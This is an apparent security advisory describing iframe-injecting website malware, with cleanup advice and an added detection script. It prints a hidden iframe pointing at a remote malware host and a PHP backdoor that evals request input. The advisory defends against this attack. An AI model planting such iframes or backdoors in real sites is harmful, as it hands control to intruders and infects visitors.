jfgjfr5jdfj.vv.cc Malware

Updated: March 31, 2011

The jfgjfr5jdfj.vv.cc malware places a malicious iframe into a website's index files; the iframe loads malware located on another website. The website is originally accessed through a vulnerability in software running on the website, and a backdoor script is inserted which allows further access to the website. In a hosting account with multiple websites, all of the websites can be infected due to one of the websites being hacked.

To clean up the website you need to revert to a clean backup or remove the iframes, or the PHP code that creates those iframes, that have been added to index files. The malware can reinfect the website using one or more backdoors that are placed on the website. Our Basic Backdoor Script Finder has been updated to detect this backdoor. You will also need to make sure the software running on the website has been secured. For WordPress you need to upgrade to the latest version. For osCommerce you need to secure the admin area and/or upgrade to osCommerce 2.3.1. For other software it usually involves upgrading to the latest version of the software.

We have been contacting the provider of the domain names and the web hosting providers for the domains being used by this malware to get those shut off, so that hacked websites cannot spread the malware.

Recent Iframe Format:

<iframe src="http://p6ox.co.cc/forum.php?tp=988ce21ce6eb1180" width="1" height="1"></iframe>

Recent Obfuscated Code format placed in .php files:

Unobfuscated PHP code (you can obfuscate PHP code using this tool):

Backdoor Script Being Placed on Websites:

if (isset($_REQUEST['asc'])) eval(stripslashes($_REQUEST['asc']));
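
An added example, not part of the original page or the Basic Backdoor Script Finder: a small Python scanner for the two artifacts shown above, the 1x1 iframe pointing at a remote host and the backdoor line that passes request input to eval. The regular expressions, function names and sample text are assumptions constructed for illustration; the obfuscated PHP variant is not covered because its code is not reproduced here.

```python
import os
import re

# Heuristic patterns (assumptions for this example; tune them for the site being cleaned).
IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.I)
TINY_DIM = r"""\b{}\s*=\s*["']?[01](?:px)?["']?(?=[\s>/])"""
TINY_W = re.compile(TINY_DIM.format("width"), re.I)
TINY_H = re.compile(TINY_DIM.format("height"), re.I)
REMOTE_SRC = re.compile(r"""\bsrc\s*=\s*["']?(?:https?:)?//""", re.I)
EVAL_INPUT = re.compile(
    r"\beval\s*\(\s*(?:\w+\s*\(\s*)*\$_(?:REQUEST|GET|POST|COOKIE)\b", re.I)

def scan_text(text):
    """Return sorted (line_number, kind) findings for one file's contents."""
    findings = []
    for m in IFRAME_TAG.finditer(text):
        tag = m.group(0)
        if TINY_W.search(tag) and TINY_H.search(tag) and REMOTE_SRC.search(tag):
            findings.append((text.count("\n", 0, m.start()) + 1, "hidden-iframe"))
    for m in EVAL_INPUT.finditer(text):
        findings.append((text.count("\n", 0, m.start()) + 1, "eval-request-backdoor"))
    return sorted(findings)

def scan_tree(root, exts=(".php", ".html", ".htm", ".js")):
    """Walk a site root and map each flagged file path to its findings."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_text(fh.read())
                if hits:
                    report[path] = hits
    return report

# Constructed sample: an index file with the injected iframe shape and the backdoor line.
SAMPLE = """<html><body>
<iframe src="http://malware.example.invalid/forum.php?tp=0000" width="1" height="1"></iframe>
<iframe src="/video/embed.html" width="640" height="360"></iframe>
<?php if (isset($_REQUEST['asc'])) eval(stripslashes($_REQUEST['asc'])); ?>
</body></html>
"""

if __name__ == "__main__":
    for line_no, kind in scan_text(SAMPLE):
        print(f"line {line_no}: {kind}")
```

Run scan_tree over every website in the hosting account, since one hacked website can lead to the others being infected.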

Recent Domains Used by the Malware:

Recent Virus Scan Identification: Mal/Iframe-V